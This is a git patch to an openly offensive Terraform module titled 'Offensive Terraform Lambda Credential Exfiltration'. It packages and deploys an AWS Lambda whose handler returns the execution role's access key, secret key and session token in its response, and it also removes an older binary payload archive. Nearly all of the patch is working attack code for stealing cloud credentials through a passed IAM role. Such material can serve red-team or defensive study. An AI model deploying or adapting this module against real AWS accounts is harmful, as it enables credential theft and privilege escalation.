From 78f6e9feca8bbbcb6636f210309452945734252e Mon Sep 17 00:00:00 2001
From: Rahul Zhade <rzhade3@users.noreply.github.com>
Date: Fri, 21 May 2021 16:28:19 -0700
Subject: [PATCH] Update tf template to zip up payload

---
 main.tf               |  10 ++++++++--
 payload.zip           | Bin 905 -> 0 bytes
 src/index.js          |  12 ++++++++++++
 src/package-lock.json |   5 +++++
 src/package.json      |  12 ++++++++++++
 5 files changed, 37 insertions(+), 2 deletions(-)
 delete mode 100644 payload.zip
 create mode 100644 src/index.js
 create mode 100644 src/package-lock.json
 create mode 100644 src/package.json

diff --git a/main.tf b/main.tf
index 0fba0a2..dffc4e6 100644
--- a/main.tf
+++ b/main.tf
@@ -1,10 +1,16 @@
+data "archive_file" "payload" {
+  type        = "zip"
+  source_dir = "src"
+  output_path = "${path.module}/.terraform/modules/lambda-function-credential-exfiltration/payload.zip"
+}
+
 resource "aws_lambda_function" "this" {
-  filename      = ".terraform/modules/lambda-function-credential-exfiltration/payload.zip"
+  filename      = data.archive_file.payload.output_path
   function_name = "test"
   role          = var.role_arn
   handler       = "index.handler"
 
-  source_code_hash = filebase64sha256(".terraform/modules/lambda-function-credential-exfiltration/payload.zip")
+  source_code_hash = filebase64sha256(data.archive_file.payload.output_path)
 
   runtime = "nodejs12.x"
 }
diff --git a/payload.zip b/payload.zip
deleted file mode 100644
index a0b8b58fa259e59a2a3f448ae10282d89bfeb65d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 905
zcmWIWW@Zs#U|`^2s9B>PSTx@*W*v|h%?J{aVaUu&Nv+V!Dh>_dWMJ0e3Xccj(h6<{
zMwYKYC19Po6AZbV4Fp=t>yJLX($rBBqT?~kk)_p5V{X&cW<J%4Dqc%}+?N)0xnO=r
z_WQo-!w<JlJ(cl4w)0stSJH|v3RxD3{fFi#?mKjzarMqCK^e?krP=ITK0NZhw9II(
z+NOg7dX5j)9`iPH-odE8^JMeK7J*X|=U+@-Zf@QZc2a8Vx4<v|&VB#(y=RiOuK5ke
zV||uq5_NQo;>0A+@*A7|tFqJcOg1rZT^5}5*XPNNzw!Za|9+XK9{6beo*WCHf8Bss
z5a{26#N_P6^i<uP{N!w)xAXJB9-s3hEPeqHqj`Mwv!H;0Q{HEMLpKElXnCwTbJE`@
z@Dd~Ew54LA>Cc`w9^w7U^MyxYk>$^mH#28iu1qY5bY2&w$AEA`@pSdT1Fwrd9R^yj
z01QtagcA_9cRdY@2VpeZP5U=;F&PTD{Qljg+B#JxE?ZlvDPiH#v$JwaRHw_#)=)3{
zpEv1p(fv0(#`D=6D&Kgnb>#g~#@HJr_Cu*trsiSn?yPWQQ<1G7Ce)p}81-plJWINe
zqx6z?=5OK68w8D>2rq7an{iY1;Hy=Jwnbkzo11Lwx43L+mG*G*c^;voA@@A)Gsj#B
zQ#m13)1c%a<FPr_NSw8s^}-2GtEqE?eGjMaV%PjuyK7>z?62&C{iS`SdU4_J{b&E*
z)>tIJer8tt%9*qD1H2iT<d|`#J_%r;Ffaf^g<(k}h=oXttdO*b79hx`Va6@8X&->5
vVToy=v7ng7V=QKTAsbr^bSu<YXzT$^#1eA>-mGjO4>1GbcOYHE1mXbzFdr}x

diff --git a/src/index.js b/src/index.js
new file mode 100644
index 0000000..9add90f
--- /dev/null
+++ b/src/index.js
@@ -0,0 +1,12 @@
+exports.handler = async (event) => {
+    
+    const response = {
+        statusCode: 200,
+        body: {
+            "AWS_ACCESS_KEY_ID": process.env.AWS_ACCESS_KEY_ID,
+            "AWS_SECRET_ACCESS_KEY": process.env.AWS_SECRET_ACCESS_KEY,
+            "AWS_SESSION_TOKEN": process.env.AWS_SESSION_TOKEN
+        },
+    };
+    return response;
+};
diff --git a/src/package-lock.json b/src/package-lock.json
new file mode 100644
index 0000000..4b0e193
--- /dev/null
+++ b/src/package-lock.json
@@ -0,0 +1,5 @@
+{
+  "name": "payload",
+  "version": "1.0.0",
+  "lockfileVersion": 1
+}
diff --git a/src/package.json b/src/package.json
new file mode 100644
index 0000000..8ef8a97
--- /dev/null
+++ b/src/package.json
@@ -0,0 +1,12 @@
+{
+  "name": "payload",
+  "version": "1.0.0",
+  "description": "Offensive Terraform Lambda Credential Exfiltration",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "Itgel Ganbold",
+  "license": "ISC",
+  "dependencies": {}
+}